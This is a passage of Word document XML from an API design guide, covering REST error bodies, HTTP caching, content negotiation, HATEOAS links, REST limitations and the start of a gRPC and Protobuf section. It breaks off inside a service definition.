    <w:p w14:paraId="14F96245" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "code": "VALIDATION_ERROR",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BB8B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "message": "Invalid email format",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14297762" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "details": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5A19A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA550DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "field": "email",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441BDF70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "message": "Must be a valid email address",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57AB84" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "rejected_value": "not-an-email"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BF35E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44944646" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758BF34" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "request_id": "req-abc123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ABE436" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "documentation_url": "https://api.example.com/docs/errors#VALIDATION_ERROR"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475EDFE8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC09D87" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0167FA25" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.5 REST and HTTP Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF41677" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caching (built into HTTP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0E8F7A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A2FBCC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA29358" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cache-Control: public, max-age=300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB6B0B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ETag: "abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4630D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="21CC18D3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Subsequent request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE10808" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  If-None-Match: "abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFDE948" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB48D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Server response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14567092" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  304 Not Modified (use cached version — saves bandwidth + processing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53294C4E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  OR: 200 OK with new data + new ETag (resource changed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7261402C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content negotiation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E7D125" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F4758" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0370B8B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Accept: application/json      (client prefers JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166AEB5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Accept-Language: en-US, fr    (client prefers English, accepts French)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED45968" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Accept-Encoding: gzip, br    (client supports compression)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53769F9B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="08D5D953" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFEFABB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Content-Type: application/json; charset=utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E58689" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Content-Language: en-US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E67353A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Content-Encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2871A46D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HATEOAS (Hypermedia-driven API):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD9F79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479BAF70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /orders/789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA6244B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="12CB2B76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F1C05" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "id": 789,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F2B09A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "status": "pending",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096DD40C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "total": 99.99,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C8A81" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "_links": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A4EE8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "self": { "href": "/orders/789" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6681DE2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "cancel": { "href": "/orders/789", "method": "DELETE" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F34E0D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "pay": { "href": "/orders/789/payment", "method": "POST" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1EA40" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "items": { "href": "/orders/789/items" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A46CCC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE95E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F9261E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6E382217" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client discovers available actions from the response itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A80BA59" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// No hardcoded URL construction needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779DB0C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Server can change URLs without breaking clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D538CB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.6 REST Limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F0B0FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC2D3AB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. Over-fetching: GET /users/42 returns ALL fields, even if client only needs name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F2753" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. Under-fetching: Need user + orders + recommendations = 3 separate requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D4A40C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. No streaming: HTTP/1.1 is request-response (no server push without workarounds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA634CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>4. No typed contract: JSON has no schema enforcement at transport level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F449182" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>5. N+1 problem: List of items, each needs related data = many round trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348F1DCA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>6. Chattiness: Complex UIs require many API calls to compose a page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176A812" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>7. No bidirectional communication: Client always initiates (WebSocket needed for push).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701AA4A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="5004BB8A">
          <v:rect id="_x0000_i6532" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AE2D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. gRPC — Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D6C63" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 What gRPC Is Built On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43C55D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F771DA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>┌─────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D795C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│          gRPC Application Code           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499EE79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  (service definitions, implementations)  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505E8979" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CCC7FD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│         Protocol Buffers (Protobuf)      │  ← Serialization (IDL + binary encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C21175E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A3E8E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>│              HTTP/2                       │  ← Transport (multiplexing, streaming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8E730D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E08CAC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│              TLS (optional)              │  ← Security (encryption, auth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268158E2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3BAAFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│              TCP                          │  ← Reliable transport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1BCAC2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>└─────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E5151" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Protocol Buffers (Protobuf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C245EC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Interface Definition Language (IDL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69016319" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543934A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>syntax = "proto3";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C767C96" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="28966654" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>package ecommerce;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE06435" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="377107DE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Service definition (the API contract)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647957C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>service OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E749E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc CreateOrder(CreateOrderRequest) returns (CreateOrderResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C7837" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
